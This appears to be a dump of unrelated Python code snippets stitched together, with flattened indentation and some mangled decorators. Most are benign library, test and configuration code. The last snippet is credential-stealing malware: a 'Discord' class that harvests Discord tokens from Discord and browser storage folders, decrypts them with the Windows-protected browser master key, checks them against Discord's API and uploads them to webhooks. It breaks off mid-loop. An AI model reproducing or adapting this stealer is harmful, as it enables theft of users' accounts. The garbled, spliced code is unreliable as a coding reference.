def remove(self, key=None, category=None, raise_exception=False, accessing_obj=None, default_access=True):
if (key is None):
self.clear(category=category, accessing_obj=accessing_obj, default_access=default_access)
return
category = (category.strip().lower() if (category is not None) else None)
for keystr in make_iter(key):
keystr = keystr.lower()
attr_objs = self.backend.get(keystr, category)
for attr_obj in attr_objs:
if (not (accessing_obj and (not attr_obj.access(accessing_obj, self._attredit, default=default_access)))):
self.backend.delete_attribute(attr_obj)
if ((not attr_objs) and raise_exception):
raise AttributeError
def clear(self, category=None, accessing_obj=None, default_access=True):
self.backend.clear_attributes(category, accessing_obj, default_access)
def all(self, category=None, accessing_obj=None, default_access=True):
attrs = self.backend.get_all_attributes()
if category:
attrs = [attr for attr in attrs if (attr.category == category)]
if accessing_obj:
return [attr for attr in attrs if attr.access(accessing_obj, self._attrread, default=default_access)]
else:
return attrs
def reset_cache(self):
self.backend.reset_cache() |
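# Scrape the first HTML table from the linked page and return (namespace, {object_name: {row name: column data}}).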
def parse_link(link):
namespace = link.split('/')[(- 2)]
print('Parsing {} link: {}'.format(namespace, link))
response = requests.get((base_url + link))
table_attr = SoupStrainer('table')
soup = BeautifulSoup(response.content, 'lxml', parse_only=table_attr)
table = soup.find('table')
if (not table):
return {}
rows = table.findAll('tr')
header = [data.text.lower() for data in rows[0].findAll('th')]
object_name = os.path.basename(os.path.normpath(link))
object_info = defaultdict(dict)
object_info[object_name] = defaultdict(dict)
for row in rows[1:]:
columns = [data.text for data in row.findAll('td')]
row_data = dict(zip(header, columns))
name = row_data.pop('name', None)
if name:
object_info[object_name][name].update(row_data)
print(('Parsing Completed for: ' + link))
return (namespace, object_info) |
class OptionPlotoptionsSeriesSonificationTracks(Options):
    @property
    def activeWhen(self) -> 'OptionPlotoptionsSeriesSonificationTracksActivewhen':
        return self._config_sub_data('activeWhen', OptionPlotoptionsSeriesSonificationTracksActivewhen)
    @property
    def instrument(self):
        return self._config_get('piano')
    @instrument.setter
    def instrument(self, text: str):
        self._config(text, js_type=False)
    @property
    def mapping(self) -> 'OptionPlotoptionsSeriesSonificationTracksMapping':
        return self._config_sub_data('mapping', OptionPlotoptionsSeriesSonificationTracksMapping)
    @property
    def midiName(self):
        return self._config_get(None)
    @midiName.setter
    def midiName(self, text: str):
        self._config(text, js_type=False)
    @property
    def pointGrouping(self) -> 'OptionPlotoptionsSeriesSonificationTracksPointgrouping':
        return self._config_sub_data('pointGrouping', OptionPlotoptionsSeriesSonificationTracksPointgrouping)
    @property
    def roundToMusicalNotes(self):
        return self._config_get(True)
    @roundToMusicalNotes.setter
    def roundToMusicalNotes(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def showPlayMarker(self):
        return self._config_get(True)
    @showPlayMarker.setter
    def showPlayMarker(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def type(self):
        return self._config_get('instrument')
    @type.setter
    def type(self, text: str):
        self._config(text, js_type=False) |
def exp(dtype):
if dtypes.is_integer(dtype):
raise NotImplementedError((('exp() of ' + str(dtype)) + ' is not supported'))
if dtypes.is_real(dtype):
polar_unit_ = None
else:
polar_unit_ = polar_unit(dtypes.real_for(dtype))
return Module(TEMPLATE.get_def('exp'), render_kwds=dict(dtype=dtype, polar_unit_=polar_unit_)) |
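# Return a Module rendering an exp() implementation for the dtype; complex dtypes additionally need
# a polar_unit helper built on the corresponding real dtype.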
def get_sns_subscriptions(app_name, env, region):
session = boto3.Session(profile_name=env, region_name=region)
sns_client = session.client('sns')
lambda_alias_arn = get_lambda_alias_arn(app=app_name, account=env, region=region)
lambda_subscriptions = []
subscriptions = sns_client.list_subscriptions()
for subscription in subscriptions['Subscriptions']:
if ((subscription['Protocol'] == 'lambda') and (subscription['Endpoint'] == lambda_alias_arn)):
lambda_subscriptions.append(subscription['SubscriptionArn'])
if (not lambda_subscriptions):
LOG.debug('SNS subscription for function %s not found', lambda_alias_arn)
return lambda_subscriptions |
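# Return the ARNs of SNS subscriptions whose protocol is 'lambda' and whose endpoint matches the
# app's Lambda alias ARN.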
def huggingface_tokenize(tokenizer, texts: List[str]) -> BatchEncoding:
warnings.warn('spacy_transformers.util.huggingface_tokenize has been moved to spacy_transformers.layers.transformer_model.huggingface_tokenize.', DeprecationWarning)
token_data = tokenizer(texts, add_special_tokens=True, return_attention_mask=True, return_offsets_mapping=isinstance(tokenizer, PreTrainedTokenizerFast), return_tensors='np', return_token_type_ids=None, padding='longest')
token_data['input_texts'] = []
for i in range(len(token_data['input_ids'])):
wp_texts = tokenizer.convert_ids_to_tokens(token_data['input_ids'][i])
token_data['input_texts'].append(wp_texts)
token_data['pad_token'] = tokenizer.pad_token
return token_data |
class TestFigureTeiElementFactory():
def test_should_render_label_description_and_id(self):
semantic_figure = SemanticFigure([SemanticLabel(layout_block=LayoutBlock.for_text('Label 1')), SemanticCaption(layout_block=LayoutBlock.for_text('Caption 1'))], content_id='fig_0')
result = _get_wrapped_figure_tei_element(semantic_figure)
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:head') == ['Label 1'])
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:label') == ['Label 1'])
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:figDesc') == ['Caption 1'])
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/:id') == ['fig_0'])
def test_should_render_graphic_element(self):
semantic_figure = SemanticFigure([SemanticLabel(layout_block=LayoutBlock.for_text('Label 1')), SemanticCaption(layout_block=LayoutBlock.for_text('Caption 1')), SemanticGraphic(layout_graphic=LayoutGraphic(local_file_path='image1.png'))], content_id='fig_0')
result = _get_wrapped_figure_tei_element(semantic_figure)
assert result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:graphic') |
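# 'Read N Characters Given read4': repeatedly fill a 4-char buffer via read4 and copy up to n
# characters into buf, returning the count actually read.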
class Solution():
def read(self, buf, n):
cnt = 0
tmp = ([''] * 4)
while (cnt < n):
curr = read4(tmp)
i = 0
while ((i < curr) and (cnt < n)):
buf[cnt] = tmp[i]
i += 1
cnt += 1
if (curr < 4):
break
return cnt |
class SagemakerBuiltinAlgorithmsTask(PythonTask[SagemakerTrainingJobConfig]):
_SAGEMAKER_TRAINING_JOB_TASK = 'sagemaker_training_job_task'
OUTPUT_TYPE = Annotated[(str, FileExt('tar.gz'))]
def __init__(self, name: str, task_config: SagemakerTrainingJobConfig, **kwargs):
if ((task_config is None) or (task_config.algorithm_specification is None) or (task_config.training_job_resource_config is None)):
raise ValueError('TaskConfig, algorithm_specification, training_job_resource_config are required')
input_type = Annotated[(str, FileExt(self._content_type_to_blob_format(task_config.algorithm_specification.input_content_type)))]
interface = Interface(inputs=kwtypes(static_hyperparameters=dict, train=FlyteDirectory[input_type], validation=FlyteDirectory[input_type]), outputs=kwtypes(model=FlyteFile[self.OUTPUT_TYPE]))
super().__init__(self._SAGEMAKER_TRAINING_JOB_TASK, name, interface=interface, task_config=task_config, **kwargs)
def get_custom(self, settings: SerializationSettings) -> Dict[(str, Any)]:
training_job = _training_job_models.TrainingJob(algorithm_specification=self._task_config.algorithm_specification, training_job_resource_config=self._task_config.training_job_resource_config)
return MessageToDict(training_job.to_flyte_idl())
def execute(self, **kwargs) -> Any:
raise NotImplementedError('Cannot execute Sagemaker Builtin Algorithms locally, for local testing, please mock!')
    @classmethod
    def _content_type_to_blob_format(cls, content_type: int) -> str:
if (content_type == _training_job_models.InputContentType.TEXT_CSV):
return 'csv'
else:
raise ValueError('Unsupported InputContentType: {}'.format(content_type)) |
class SlatWallEdge(WallEdge):
def lengths(self, length):
pitch = self.settings.pitch
h = self.settings.hook_height
he = self.settings.hook_extra_height
lengths = []
if (length < (h + he)):
return [length]
lengths = [0, (h + he)]
length -= (h + he)
if (length > pitch):
lengths.extend([(((((length // pitch) * pitch) - h) - 2) - (2 * he)), ((h + 2) + (2 * he)), (length % pitch)])
else:
lengths.append(length)
return lengths
def _section(self, nr, length):
w = self.settings.hook_height
hd = self.settings.hook_depth
hdist = self.settings.hook_distance
hh = self.settings.hook_overall_height
ro = w
ri = min((w / 2), (hd / 2))
rt = min(1, (hd / 2))
slot = (self.settings.hook_height + 2)
if (nr == 0):
poly = [0, (- 90), (hdist - ri), ((- 90), ri), (((hh - ri) - w) - rt), (90, rt), (hd - (2 * rt)), (90, rt), ((hh - ro) - rt), (90, ro), ((hdist + hd) - ro), (- 90), (length - 6)]
elif (nr == 1):
if (self.settings.bottom_hook == 'spring'):
r_plug = (slot * 0.4)
slotslot = (slot - (r_plug * (2 ** 0.5)))
poly = [self.settings.hook_extra_height, (- 90), 5.0, (- 45), 0, (135, r_plug), 0, 90, 10, (- 90), slotslot, (- 90), 10, 90, 0, (135, r_plug), 0, (- 45), 5, (- 90), self.settings.hook_extra_height]
elif (self.settings.bottom_hook == 'hook'):
d = 2
poly = [((self.settings.hook_extra_height + d) - 1), (- 90), (4.5 + hd), (90, 1), (slot - 2), (90, 1), (hd - 1), 90, d, (- 90), 5.5, (- 90), (self.settings.hook_extra_height + 1)]
elif (self.settings.bottom_hook == 'stud'):
poly = [self.settings.hook_extra_height, (- 90), 6, (90, 1), (slot - 2), (90, 1), 6, (- 90), self.settings.hook_extra_height]
else:
poly = [((2 * self.settings.hook_extra_height) + slot)]
if self._reversed:
poly = reversed(poly)
self.polyline(*poly)
def margin(self) -> float:
return (self.settings.hook_depth + self.settings.hook_distance) |
def __getattr__(name):
if (name in {'marker_trait'}):
from warnings import warn
import enable.api
warn(f'Please import {name} from enable.api instead of chaco.api.', DeprecationWarning)
return getattr(enable.api, name)
raise AttributeError(f'module {__name__!r} has no attribute {name!r}') |
class OptionSeriesVectorClusterZonesMarker(Options):
    @property
    def enabled(self):
        return self._config_get(None)
    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def fillColor(self):
        return self._config_get(None)
    @fillColor.setter
    def fillColor(self, text: str):
        self._config(text, js_type=False)
    @property
    def height(self):
        return self._config_get(None)
    @height.setter
    def height(self, num: float):
        self._config(num, js_type=False)
    @property
    def lineColor(self):
        return self._config_get('#ffffff')
    @lineColor.setter
    def lineColor(self, text: str):
        self._config(text, js_type=False)
    @property
    def lineWidth(self):
        return self._config_get(0)
    @lineWidth.setter
    def lineWidth(self, num: float):
        self._config(num, js_type=False)
    @property
    def radius(self):
        return self._config_get(15)
    @radius.setter
    def radius(self, num: float):
        self._config(num, js_type=False)
    @property
    def symbol(self):
        return self._config_get('cluster')
    @symbol.setter
    def symbol(self, text: str):
        self._config(text, js_type=False)
    @property
    def width(self):
        return self._config_get(None)
    @width.setter
    def width(self, num: float):
        self._config(num, js_type=False) |
def test_simple_plot_with_seismics(tmpdir, show_plot, generate_plot):
mywell = xtgeo.well_from_file(USEFILE7)
mycube = xtgeo.cube_from_file(USEFILE6)
mysurfaces = []
mysurf = xtgeo.surface_from_file(USEFILE2)
for i in range(10):
xsurf = mysurf.copy()
xsurf.values = (xsurf.values + (i * 20))
xsurf.name = f'Surface_{i}'
mysurfaces.append(xsurf)
myplot = XSection(zmin=1000, zmax=1900, well=mywell, surfaces=mysurfaces, cube=mycube, sampling=10, nextend=2)
clist = [0, 1, 222, 3, 5, 7, 3, 12, 11, 10, 9, 8]
cfil1 = 'xtgeo'
cfil2 = (TPATH / 'etc/colortables/colfacies.txt')
assert (222 in clist)
assert ('xtgeo' in cfil1)
assert ('colfacies' in str(cfil2))
myplot.colormap = cfil1
myplot.canvas(title='Plot with seismics', subtitle='Some well')
myplot.plot_cube()
myplot.plot_surfaces(fill=False)
myplot.plot_well()
myplot.plot_map()
if generate_plot:
myplot.savefig(join(tmpdir, 'xsect_wcube.png'), last=False)
if show_plot:
myplot.show()
myplot.close() |
class BasePolicyComposer(ABC):
def __init__(self, action_spaces_dict: Dict[(StepKeyType, spaces.Dict)], observation_spaces_dict: Dict[(StepKeyType, spaces.Dict)], agent_counts_dict: Dict[(StepKeyType, int)], distribution_mapper: DistributionMapper):
self._action_spaces_dict = action_spaces_dict
self._observation_spaces_dict = observation_spaces_dict
self._agent_counts_dict = agent_counts_dict
self._distribution_mapper = distribution_mapper
self._obs_shapes = observation_spaces_to_in_shapes(observation_spaces_dict)
self._action_logit_shapes = {step_key: {action_head: self._distribution_mapper.required_logits_shape(action_head) for action_head in action_spaces_dict[step_key].spaces.keys()} for step_key in action_spaces_dict.keys()}
def policy(self) -> TorchPolicy: |
def test_local_raw_fsspec(source_folder):
with tempfile.TemporaryDirectory() as dest_tmpdir:
local.put(source_folder, dest_tmpdir, recursive=True)
new_temp_dir_2 = tempfile.mkdtemp()
new_temp_dir_2 = os.path.join(new_temp_dir_2, 'doesnotexist')
local.put(source_folder, new_temp_dir_2, recursive=True)
files = local.find(new_temp_dir_2)
assert (len(files) == 2) |
class TestComposerThread_perform_gating(ComposerThreadBaseTestCase):
def test_expires_compose_updates(self):
config['test_gating.required'] = True
task = self._make_task()
t = ComposerThread(self.semmock, task['composes'][0], 'bowlofeggs', self.Session, self.tempdir)
t.compose = Compose.from_dict(self.db, task['composes'][0])
t.compose.updates[0].test_gating_status = TestGatingStatus.failed
t.db = self.db
t.id = getattr(self.db.query(Release).one(), '{}_tag'.format('stable'))
with mock_sends(api.Message):
t.perform_gating()
assert (len(t.compose.updates) == 0) |
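# Check compress_G2/decompress_G2 flag bits: c_flag marks the compressed encoding, b_flag marks the
# point at infinity, and a_flag records whether the imaginary part of y lies in the upper half of
# the field; off-curve points must raise ValueError.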
@pytest.mark.parametrize('pt,on_curve,is_infinity', [(G2, True, False), (multiply(G2, 5), True, False), (Z2, True, True), ((FQ2([5566, 5566]), FQ2([5566, 5566]), FQ2.one()), False, None)])
def test_G2_compress_and_decompress_flags(pt, on_curve, is_infinity):
if on_curve:
(z1, z2) = compress_G2(pt)
x1 = (z1 % POW_2_381)
c_flag1 = ((z1 % POW_2_384) // POW_2_383)
b_flag1 = ((z1 % POW_2_383) // POW_2_382)
a_flag1 = ((z1 % POW_2_382) // POW_2_381)
x2 = (z2 % POW_2_381)
c_flag2 = ((z2 % POW_2_384) // POW_2_383)
b_flag2 = ((z2 % POW_2_383) // POW_2_382)
a_flag2 = ((z2 % POW_2_382) // POW_2_381)
assert (x1 < q)
assert (x2 < q)
assert (c_flag2 == b_flag2 == a_flag2 == 0)
assert (c_flag1 == 1)
if is_infinity:
assert (b_flag1 == 1)
assert (a_flag1 == x1 == x2 == 0)
else:
assert (b_flag1 == 0)
(_, y) = normalize(pt)
(_, y_im) = y.coeffs
assert (a_flag1 == ((y_im * 2) // q))
assert (normalize(decompress_G2((z1, z2))) == normalize(pt))
else:
with pytest.raises(ValueError):
compress_G2(pt) |
class TestRefAddrOnDWARFv2With64BitTarget(unittest.TestCase):
def test_main(self):
with open(os.path.join('test', 'testfiles_for_unittests', 'arm64_on_dwarfv2.info.dat'), 'rb') as f:
info = f.read()
with open(os.path.join('test', 'testfiles_for_unittests', 'arm64_on_dwarfv2.abbrev.dat'), 'rb') as f:
abbrev = f.read()
with open(os.path.join('test', 'testfiles_for_unittests', 'arm64_on_dwarfv2.str.dat'), 'rb') as f:
str = f.read()
di = DWARFInfo(config=DwarfConfig(little_endian=True, default_address_size=8, machine_arch='ARM64'), debug_info_sec=DebugSectionDescriptor(io.BytesIO(info), '__debug_info', None, len(info), 0), debug_aranges_sec=None, debug_abbrev_sec=DebugSectionDescriptor(io.BytesIO(abbrev), '__debug_abbrev', None, len(abbrev), 0), debug_frame_sec=None, eh_frame_sec=None, debug_str_sec=DebugSectionDescriptor(io.BytesIO(str), '__debug_str', None, len(str), 0), debug_loc_sec=None, debug_ranges_sec=None, debug_line_sec=None, debug_pubtypes_sec=None, debug_pubnames_sec=None, debug_addr_sec=None, debug_str_offsets_sec=None, debug_line_str_sec=None, debug_loclists_sec=None, debug_rnglists_sec=None, debug_sup_sec=None, gnu_debugaltlink_sec=None)
CUs = [cu for cu in di.iter_CUs()]
CU = CUs[21]
self.assertEqual(CU['version'], 2)
self.assertEqual(CU.structs.dwarf_format, 32)
self.assertEqual(CU['address_size'], 8)
DIEs = [die for die in CU.iter_DIEs()]
self.assertEqual(len(DIEs), 15) |
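# Roll all environments forward slot by slot, appending each environment's slot indices until every
# environment has finished, then return the per-environment slot lists.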
def acquire_episodes(buffer, env, agent, env_info, agent_info):
flag = True
slots = None
(observation, env_running) = env.reset(env_info)
slots = [[] for k in range(env.n_envs())]
t = 0
agent_state = None
while True:
(env_to_slots, agent_state, observation, agent_info, env_running) = acquire_slot(buffer, env, agent, agent_state, observation, agent_info, env_running)
[slots[k].append(env_to_slots[k]) for k in env_to_slots]
if (env_running.size()[0] == 0):
return tuple(slots)
t = (t + 1) |
def test_unregister_unknown_lookups(registry: ABIRegistry):
with pytest.raises(KeyError, match='Matcher .* not found in encoder registry'):
registry.unregister((lambda x: x))
with pytest.raises(KeyError, match='Label .* not found in encoder registry'):
registry.unregister('foo') |
def extractPenumbrale(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
_ordering
class SemanticVersion(Version):
name = 'Semantic'
def prerelease(self):
try:
version_info = semver.VersionInfo.parse(self.parse())
except ValueError:
return False
if version_info.prerelease:
return True
for pre_release_filter in self.pre_release_filters:
if (pre_release_filter and (pre_release_filter in self.version)):
return True
return False
def __eq__(self, other):
try:
result = semver.compare(self.parse(), other.parse())
except ValueError:
if (self.parse() != other.parse()):
return False
else:
return True
if (result != 0):
return False
return True
def __lt__(self, other):
try:
result = semver.compare(self.parse(), other.parse())
except ValueError:
try:
semver.VersionInfo.parse(self.parse())
except ValueError:
return True
return False
if (result != (- 1)):
return False
return True |
class BuildrootOverride(Base):
__tablename__ = 'buildroot_overrides'
__include_extras__ = ('nvr',)
__get_by__ = ('build_id',)
notes = Column(UnicodeText, nullable=False)
submission_date = Column(DateTime, default=datetime.utcnow, nullable=False)
expiration_date = Column(DateTime, nullable=False)
expired_date = Column(DateTime)
build_id = Column(Integer, ForeignKey('builds.id'), nullable=False)
build = relationship('Build', lazy='joined', innerjoin=True, back_populates='override')
submitter_id = Column(Integer, ForeignKey('users.id'), nullable=False)
submitter = relationship('User', lazy='joined', innerjoin=True, back_populates='buildroot_overrides')
def nvr(self) -> str:
return self.build.nvr
    @classmethod
    def new(cls, request: 'pyramid.request', **data) -> 'BuildrootOverride':
db = request.db
build = data['build']
if (build.override is not None):
request.errors.add('body', 'nvr', ('%s is already in a override' % build.nvr))
return
old_build = db.query(Build).filter(and_((Build.package_id == build.package_id), (Build.release_id == build.release_id))).first()
if ((old_build is not None) and (old_build.override is not None)):
log.debug(f"Expiring BRO for {old_build.nvr} because it's superseded by {build.nvr}.")
old_build.override.expire()
db.add(old_build.override)
override = cls(**data)
override.enable()
db.add(override)
db.flush()
return override
    @classmethod
    def edit(cls, request: 'pyramid.request', **data) -> 'BuildrootOverride':
db = request.db
edited = data.pop('edited')
override = cls.get(edited.id)
if (override is None):
request.errors.add('body', 'edited', 'No buildroot override for this build')
return
override.submitter = data['submitter']
override.notes = data['notes']
override.expiration_date = data['expiration_date']
if ('submission_date' in data):
override.submission_date = data['submission_date']
now = datetime.utcnow()
if ((override.expired_date is not None) and (override.expiration_date > now)):
override.enable()
elif data['expired']:
log.debug(f'Expiring BRO for {override.build.nvr} because it was edited.')
override.expire()
db.add(override)
db.flush()
return override
def enable(self) -> None:
koji_session = buildsys.get_session()
for tag in (self.build.release.inherited_override_tags + [self.build.release.override_tag]):
koji_session.tagBuild(tag, self.build.nvr)
notifications.publish(override_schemas.BuildrootOverrideTagV1.from_dict(dict(override=self)))
self.expired_date = None
def expire(self) -> None:
if (self.expired_date is not None):
return
koji_session = buildsys.get_session()
for tag in (self.build.release.inherited_override_tags + [self.build.release.override_tag]):
try:
koji_session.untagBuild(tag, self.build.nvr, strict=True)
except Exception as e:
log.error(f"Unable to untag override {self.build.nvr} from {tag}: '{e}'")
self.expired_date = datetime.utcnow()
notifications.publish(override_schemas.BuildrootOverrideUntagV1.from_dict({'override': self})) |
def test_global_ptr_addr():
base_args = ['python', 'decompile.py', 'tests/samples/bin/systemtests/64/0/globals']
args1 = (base_args + ['global_addr_ptr_add'])
output = str(subprocess.run(args1, check=True, capture_output=True).stdout)
assert (output.count('e = 0x17') == 1)
assert (output.count('f = 0x42') == 1)
assert (output.count('h = 0x0') == 1)
assert (output.count('unsigned int * g = &(e)') == 1)
(len(re.findall('h = &f', output)) == 1)
(len(re.findall('var_[0-9]+= h', output)) == 1)
(len(re.findall('var_[0-9]+= g', output)) == 1)
(len(re.findall('_add(var_[0-9]+, var_[0-9]+)', output)) == 1) |
@pytest.mark.parametrize('overrides,output', [([], 'MySQL connecting to localhost'), (['db=postgresql'], 'PostgreSQL connecting to localhost')])
def test_instantiate_schema(tmpdir: Path, overrides: List[str], output: str) -> None:
cmd = (['examples/instantiate/schema/my_app.py', ('hydra.run.dir=' + str(tmpdir)), 'hydra.job.chdir=True'] + overrides)
(result, _err) = run_python_script(cmd)
assert (result == output) |
def test_cli_path_or_dash():
cli = Radicli()
file_name = 'my_file.txt'
ran1 = False
ran2 = False
    @cli.command('test1', a=Arg())
def test1(a: ExistingFilePathOrDash):
assert (str(a) == str(file_path))
nonlocal ran1
ran1 = True
    @cli.command('test2', a=Arg())
def test2(a: ExistingFilePathOrDash):
assert (a == '-')
nonlocal ran2
ran2 = True
with make_tempdir() as d:
file_path = (d / file_name)
file_path.touch()
bad_path = Path((d / 'x.txt'))
cli.run(['', 'test1', str(file_path)])
assert ran1
cli.run(['', 'test2', '-'])
assert ran2
with pytest.raises(CliParserError):
cli.run(['', 'test1', str(bad_path)])
with pytest.raises(CliParserError):
cli.run(['', 'test2', '_']) |
def get_time_steps_str(time_steps) -> str:
if (time_steps < 1000):
time_steps_str = f'{time_steps}'
elif (1000 <= time_steps < (1000 * 1000)):
time_steps_str = f'{(time_steps / 1000)}K'
else:
time_steps_str = f'{((time_steps / 1000) / 1000)}M'
return time_steps_str |
class TorchSharedStateActionCritic(TorchStateActionCritic):
    @override(TorchStateActionCritic)
def predict_q_values(self, observations: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], actions: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], gather_output: bool) -> Dict[(Union[(str, int)], List[Union[(torch.Tensor, Dict[(str, torch.Tensor)])]])]:
flattened_observations = flatten_spaces(observations.values())
flattened_actions = flatten_spaces(actions.values())
assert (len(self.step_critic_keys) == 1)
step_id = self.step_critic_keys[0]
if all(self.only_discrete_spaces.values()):
out = self.compute_state_action_values_step(flattened_observations, step_id)
if gather_output:
out = [{action_key: action_value.gather((- 1), flattened_actions[action_key.replace('_q_values', '')].long().unsqueeze((- 1))).squeeze((- 1)) for (action_key, action_value) in critic_out.items()} for critic_out in out]
q_value = out
else:
q_value = self.compute_state_action_value_step(flattened_observations, flattened_actions, step_id)
q_values = {step_id: q_value}
return q_values
    @override(TorchStateActionCritic)
def predict_next_q_values(self, next_observations: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], next_actions: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], next_actions_logits: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], next_actions_log_probs: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], alpha: Dict[(Union[(str, int)], torch.Tensor)]) -> Dict[(Union[(str, int)], Union[(torch.Tensor, Dict[(str, torch.Tensor)])])]:
flattened_next_observations = flatten_spaces(next_observations.values())
flattened_next_actions = flatten_spaces(next_actions.values())
flattened_next_actions_logits = flatten_spaces(next_actions_logits.values())
flattened_next_action_log_probs = flatten_spaces(next_actions_log_probs.values())
assert (len(self.step_critic_keys) == 1)
step_id = self.step_critic_keys[0]
alpha = sum(alpha.values())
if all(self.only_discrete_spaces.values()):
next_q_values = self.compute_state_action_values_step(flattened_next_observations, critic_id=(step_id, self.target_key))
transpose_next_q_value = {k: [dic[k] for dic in next_q_values] for k in next_q_values[0]}
next_q_value = dict()
for (q_action_head, q_values) in transpose_next_q_value.items():
action_key = q_action_head.replace('_q_values', '')
tmp_q_value = torch.stack(q_values).min(dim=0).values
next_action_probs = logits_to_probs(flattened_next_actions_logits[action_key])
next_action_log_probs = torch.log((next_action_probs + ((next_action_probs == 0.0).float() * 1e-08)))
next_q_value[action_key] = torch.matmul(next_action_probs.unsqueeze((- 2)), (tmp_q_value - (alpha * next_action_log_probs)).unsqueeze((- 1))).squeeze((- 1)).squeeze((- 1))
else:
next_q_value = self.compute_state_action_value_step(flattened_next_observations, flattened_next_actions, (step_id, self.target_key))
next_q_value = (torch.stack(next_q_value).min(dim=0).values - (alpha * torch.stack(list(flattened_next_action_log_probs.values())).mean(dim=0)))
return {step_id: next_q_value}
(TorchStateActionCritic)
def num_critics(self) -> int:
return 1 |
class Discord():
def __init__(self):
self.baseurl = '
self.appdata = os.getenv('localappdata')
self.roaming = os.getenv('appdata')
self.regex = '[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}'
self.encrypted_regex = 'dQw4w9WgXcQ:[^\\"]*'
self.tokens_sent = []
self.tokens = []
self.ids = []
self.grabTokens()
self.upload(__WEBHOOK__)
self.upload(uwu)
def decrypt_val(self, buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:(- 16)].decode()
return decrypted_pass
except Exception:
return 'Failed to decrypt password'
def get_master_key(self, path):
with open(path, 'r', encoding='utf-8') as f:
c = f.read()
local_state = json.loads(c)
master_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def grabTokens(self):
paths = {'Discord': (self.roaming + '\\discord\\Local Storage\\leveldb\\'), 'Discord Canary': (self.roaming + '\\discordcanary\\Local Storage\\leveldb\\'), 'Lightcord': (self.roaming + '\\Lightcord\\Local Storage\\leveldb\\'), 'Discord PTB': (self.roaming + '\\discordptb\\Local Storage\\leveldb\\'), 'Opera': (self.roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\'), 'Opera GX': (self.roaming + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\'), 'Amigo': (self.appdata + '\\Amigo\\User Data\\Local Storage\\leveldb\\'), 'Torch': (self.appdata + '\\Torch\\User Data\\Local Storage\\leveldb\\'), 'Kometa': (self.appdata + '\\Kometa\\User Data\\Local Storage\\leveldb\\'), 'Orbitum': (self.appdata + '\\Orbitum\\User Data\\Local Storage\\leveldb\\'), 'CentBrowser': (self.appdata + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\'), '7Star': (self.appdata + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\'), 'Sputnik': (self.appdata + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\'), 'Vivaldi': (self.appdata + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\'), 'Chrome SxS': (self.appdata + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\'), 'Chrome': (self.appdata + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\'), 'Chrome1': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\'), 'Chrome2': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\'), 'Chrome3': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\'), 'Chrome4': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\'), 'Chrome5': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\'), 'Epic Privacy Browser': (self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\'), 'Microsoft Edge': (self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\'), 'Uran': (self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\'), 'Yandex': (self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\'), 'Brave': (self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\'), 'Iridium': (self.appdata + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\')}
for (name, path) in paths.items():
if (not os.path.exists(path)):
continue
disc = name.replace(' ', '').lower()
if ('cord' in path):
if os.path.exists((self.roaming + f'\{disc}\Local State')):
for file_name in os.listdir(path):
if (file_name[(- 3):] not in ['log', 'ldb']):
continue
for line in [x.strip() for x in open(f'{path}\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in re.findall(self.encrypted_regex, line):
try:
token = self.decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), self.get_master_key((self.roaming + f'\{disc}\Local State')))
except ValueError:
pass
try:
r = requests.get(self.baseurl, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token})
if (r.status_code == 200):
uid = r.json()['id']
if (uid not in self.ids):
self.tokens.append(token)
self.ids.append(uid)
except Exception:
pass
for file_name in os.listdir(path):
if (file_name[(- 3):] not in ['log', 'ldb']):
continue
for line in [x.strip() for x in open(f'{path}\{file_name}', errors='ignore').readlines() if x.strip()]:
for token in re.findall(self.regex, line):
try:
